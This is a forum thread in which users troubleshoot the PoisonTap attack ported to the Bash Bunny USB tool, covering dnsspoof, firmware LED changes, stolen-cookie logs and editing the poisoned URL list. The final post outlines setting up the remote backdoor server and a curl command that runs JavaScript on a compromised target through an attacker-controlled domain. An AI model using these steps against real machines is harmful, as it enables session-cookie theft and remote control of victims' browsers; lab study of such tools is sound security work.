Jump to content

PoisonTap on the Bunny


jhaddix

Recommended Posts

Having a lot of fun playing with BB and BunyTap.  I've gotten it to load and run however I'm seeing a bit of strangeness.  1) The payload.txt runs without throwing an error but when I ssh into the BB and do a "ps -aux | grep -i screen"   I only see the /usr/bin/node.js running.  when I run the line from the payload.txt file "/usr/bin/screen -dmS dnsspoof /usr/sbin/dnsspoof -i usb0 port 53" and run the grep again, it shows up in the list.  At this point I'm looking for the DNS requests to be redirected, but no-joy on that so I unplug and restart from scratch.  After BB & BunnyTap start up again i ssh back in and check and again dnsspoof isnt running. So this time I ran it using "/usr/sbin/dnsspoof -i usb0 port 53" so I could see any output.  Testing DNS requests this time resulted in the dnsspoof responses below, but again all dns requests come back with the correct IP. (used dig, ping and browser in testing).  Wireshark running on the OS X side didn't show any dns traffic from the BB either (tried it with capture set for the BB interface and again using the interface on the OS X).   

Anyone else seen this behavior (if so how'd you fix it)?  

Whistle Master - any ideas/tests that I can try?

Thanks 

 

<dnsspoof output> 

172.16.64.1.36702 > 8.8.8.8.53:  60675+ A? citibank.com

172.16.64.1.52442 > 8.8.8.8.53:  2452+ A? google.com

172.16.64.1.44733 > 8.8.8.8.53:  7511+ A? citibank.com

172.16.64.1.59932 > 8.8.8.8.53:  47184+ A? anyhwere.com

172.16.64.1.44565 > 8.8.8.8.53:  57995+ A? anyhwere.com

172.16.64.1.50786 > 8.8.8.8.53:  32458+ A? anyhwere.com

172.16.64.1.44234 > 8.8.8.8.53:  12251+ A? anyhwere.com

172.16.64.1.58344 > 8.8.8.8.53:  10966+ A? example.cm

172.16.64.1.57680 > 8.8.8.8.53:  35170+ A? example.com

172.16.64.1.58216 > 8.8.8.8.53:  10032+ A? may.com

   

Link to comment
Share on other sites

  • Replies 52
  • Created
  • Last Reply

Update:  I plugged BB w/BT into a windows 7 laptop and it ran like a champ dumping cookies into the posontap.cookies.log. But for reasons I haven't sorted out yet it appears the BunnyTap is getting no love from the iMac (runs but nothing on screen and no cookies in the log file).  Going to try it on a MBP just as soon as the wife isn't looking (evil grin).... just kidding, she's used to my ""testing"" stuff on her system.   Deal is "i break-it - I bought it" lol

If anyone has already successfully ran BunnyTap on an iMac (or a MBP for that matter), I'd appreciate it if you gave a quick reply to let me know.

Thanks

 

 

Link to comment
Share on other sites

On 3/18/2017 at 1:35 PM, graythang said:

Update:  I plugged BB w/BT into a windows 7 laptop and it ran like a champ dumping cookies into the posontap.cookies.log. But for reasons I haven't sorted out yet it appears the BunnyTap is getting no love from the iMac (runs but nothing on screen and no cookies in the log file).  Going to try it on a MBP just as soon as the wife isn't looking (evil grin).... just kidding, she's used to my ""testing"" stuff on her system.   Deal is "i break-it - I bought it" lol

If anyone has already successfully ran BunnyTap on an iMac (or a MBP for that matter), I'd appreciate it if you gave a quick reply to let me know.

Thanks

 

 

Did you change the ATTACKMODE in the payload.txt?

Link to comment
Share on other sites

On 3/14/2017 at 7:33 PM, Onus said:

q

 

I've got the backend server up and running and curl commands work (I can send cmds to the client via the backdoor across the Internet).  Working on a hiccup - once i have it resolved I'll post a walkthrough on how I set it up if anyone is still interested in it for their own lab.  The hiccup I'm working on is on the client side... Bunnytap runs, collects cookies but ws isn't opened and it appears the backdoor isn't getting installed (i.e. cached) during the run.  I can manually open the backdoor file I copied over to the client in the browser and it triggers the web service connection and at this point I can send curl commands etc.  So the file works, but only if I kick it off manually.   Client is Win7 and I get the same results in both IE 11 and Chrome. odd.  

 

 

Link to comment
Share on other sites

On 3/29/2017 at 10:34 PM, graythang said:

I've got the backend server up and running and curl commands work (I can send cmds to the client via the backdoor across the Internet).  Working on a hiccup - once i have it resolved I'll post a walkthrough on how I set it up if anyone is still interested in it for their own lab.  The hiccup I'm working on is on the client side... Bunnytap runs, collects cookies but ws isn't opened and it appears the backdoor isn't getting installed (i.e. cached) during the run.  I can manually open the backdoor file I copied over to the client in the browser and it triggers the web service connection and at this point I can send curl commands etc.  So the file works, but only if I kick it off manually.   Client is Win7 and I get the same results in both IE 11 and Chrome. odd.  

 

 

Yes a walkthrough would be clutch 

Link to comment
Share on other sites

So i have the posion tap files but when trying to get it to work i get the blinking red light then goes to white and sits there forever......
Anyone succesfully installed the posiontap on bashbunny?

Link to comment
Share on other sites

@Mr.Pupp3T

To install it manually:

1. Share internet (http://wiki.bashbunny.com/#!./index.md#Sharing_an_Internet_Connection_with_the_Bash_Bunny_from_Windows)

2. Connect over TCP (172.16.64.1) to the BashBunny

3. Run

ping 8.8.8.8

to be sure, internet is working (ping googles DNS)

4. Run

apt-get -y install dsniff

to install "dsniff"

5. Delete (or rename) "install.sh" in the swtich# folder where PiosionTab is so the bunny doesen't try to run it
(red blinking when failed / no internet, you already installed dependencies by step 4!)
(Maybe easier when you replug BashBunny in arming-mode (Serial and storage))

6. Try it again

 

@Dave-ee Jones

On the BashBunny, you log in as "root", so you already call everything as admin..
As funny like "Do you tried to turn it off and back on again?" :P

Link to comment
Share on other sites

6 hours ago, Mr.Pupp3T said:

when trying to install the ./install im getting permissons deined iv tried everything to get it to work anyi deaS? 

 

1 hour ago, Dave-ee Jones said:

Including run as admin? :P

Just firgured out, what could be the problem.. Have you tried to install it on your local machine instead on the BashBunny?

Install it on the BashBunny, not on your computer. BashBunny needs it, not you ;)

Link to comment
Share on other sites

3 hours ago, Gachnang said:

@Mr.Pupp3T

To install it manually:

1. Share internet (http://wiki.bashbunny.com/#!./index.md#Sharing_an_Internet_Connection_with_the_Bash_Bunny_from_Windows)

2. Connect over TCP (172.16.64.1) to the BashBunny

3. Run


ping 8.8.8.8

to be sure, internet is working (ping googles DNS)

4. Run


apt-get -y install dsniff

to install "dsniff"

5. Delete (or rename) "install.sh" in the swtich# folder where PiosionTab is so the bunny doesen't try to run it
(red blinking when failed / no internet, you already installed dependencies by step 4!)
(Maybe easier when you replug BashBunny in arming-mode (Serial and storage))

6. Try it again

 

@Dave-ee Jones

On the BashBunny, you log in as "root", so you already call everything as admin..
As funny like "Do you tried to turn it off and back on again?" :P

5
 
 

ok so i have done what you have said above. I'm running the dsniff command, an it says failed to fetch the required files.

Link to comment
Share on other sites

So I have been playing with this.  Worked right off the back.  Noticed on my Windows 10 test machine it fires up the browser automatically, wonder if it pretends to be a hotel network with a captive portal and with MS and all their auto stuff fires off a browser to it so you can okay the agreement?

Anyway.  I have been wondering how you can modify the poison url list?  Have not been able to find it yet.  Must be missing something.  Wondered if it can be changed for more targeted attacks.

Have issues getting the poisoned pages to respond back to my backend server that is on another machine but have a funny feeling it might be because domain violation with and external site trying to talk to an internal site.  Might have to try using a hosted to host it and see what happens.

Link to comment
Share on other sites

6 hours ago, PoSHMagiC0de said:

I have been wondering how you can modify the poison url list?  Have not been able to find it yet.

At the bottom of "target_injected_xhtmljs.html" is a function called "getDoms" which returns the list of urls.
You can freely edit it there.

Link to comment
Share on other sites

Bunnytap from repo not working with 1.1. No results popping up and LED turns off completely afterwards but stays red.

 

UPDATE: Seems to be completely incompatible with new firmware. Tried repo and modified versions of bunnytap and it seems to be broken. Other updated payloads are working fine.

Link to comment
Share on other sites

I was running into similar issue and it appears that the new firmware fails on previously valid LED combinations.  For instance, any reference to LED R G B now seems to fail on firmware 1.1 since the proper syntax is now LED W.  I was able to get this to work by replacing all combination LED commands in install.sh and payload.txt with the new composite LED commands. 

This seems like an oversight and will probably break all previously created scripts that used combo-LED commands.  I would expect a future update that will accept both multi and composite codes so previous payloads using mutli-codes won't continue to fail just because of the syntax change.

Link to comment
Share on other sites

On 4/9/2017 at 1:36 AM, maehko said:

I was running into similar issue and it appears that the new firmware fails on previously valid LED combinations.  For instance, any reference to LED R G B now seems to fail on firmware 1.1 since the proper syntax is now LED W.  I was able to get this to work by replacing all combination LED commands in install.sh and payload.txt with the new composite LED commands. 

This seems like an oversight and will probably break all previously created scripts that used combo-LED commands.  I would expect a future update that will accept both multi and composite codes so previous payloads using mutli-codes won't continue to fail just because of the syntax change.

Can't get it to run anymore. The lights come on but the attack does not work. Nothing pops up stating I am getting cookies. Think this is the only payload that is bricked for me besides quickcreds. I edited like you said you did and nothing pops up anymore.

Link to comment
Share on other sites

On 3/30/2017 at 11:27 PM, wrxratd said:

Yes a walkthrough would be clutch 

Things have gotten really hectic and haven't had the chance to do this up right. But since someone asked about it, here is a brief rundown on how I setup node.js

You will need to setup a URL that you can use.  I was a lazy and setup a DYNDNS to point back to myself then used VMs in bridged mode and let them run (it was simpler for me to open the inbound port I used on my FW when ever I was testing and close it afterwards).

Next - I Installed node.js on Kali.   I followed these instructions  (https://relutiondev.wordpress.com/2016/01/09/installing-nodejs-and-npm-kaliubuntu/),

when finished with the install run  "npm install websocket" (the setup wouldn't work until i did this bit)

Next load up poison tap on Kali using "get clone https://github.com/samyk/poisontap.git".

If your using the default port (1337), no other changes are needed. But you'll need to read Samy's instructions and update a few files if your changing the port.

Now, edit the BunnyTap "backdoor.html" replacing all occurrences of "YOUR.DOMAIN" with your DYNDNS URL.

on Kali cd in to the poisontap directory and run "node backend_server.js".   The response you should see will have "Server is listening on port 1337" listed in it. 

Now take the BB and run your attack.

*****notes******

Even though both are on my network the traffic from target to node.js server was:    

[target Win7 vm]   -> Internet -> DynDNS -> [my FW] -> [Kali Vm]   

 

As I noted in my previous post, I found that the attack worked but the back door wasn't available until I manually ran the "backdoor.html on the target. Once i did I could use a curl command on Kali to have the node.js pop an alert on the win7 target.  

e.g.: curl 'http://myDYNDNS.URL:1337/exec?alert("test")'

Haven't had time to work out why the back door isn't automatically loading on the target when the attack is ran yet.

 Sorry about the rush job and I hope this helps someone a little.

Link to comment
Share on other sites

  • 5 months later...

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...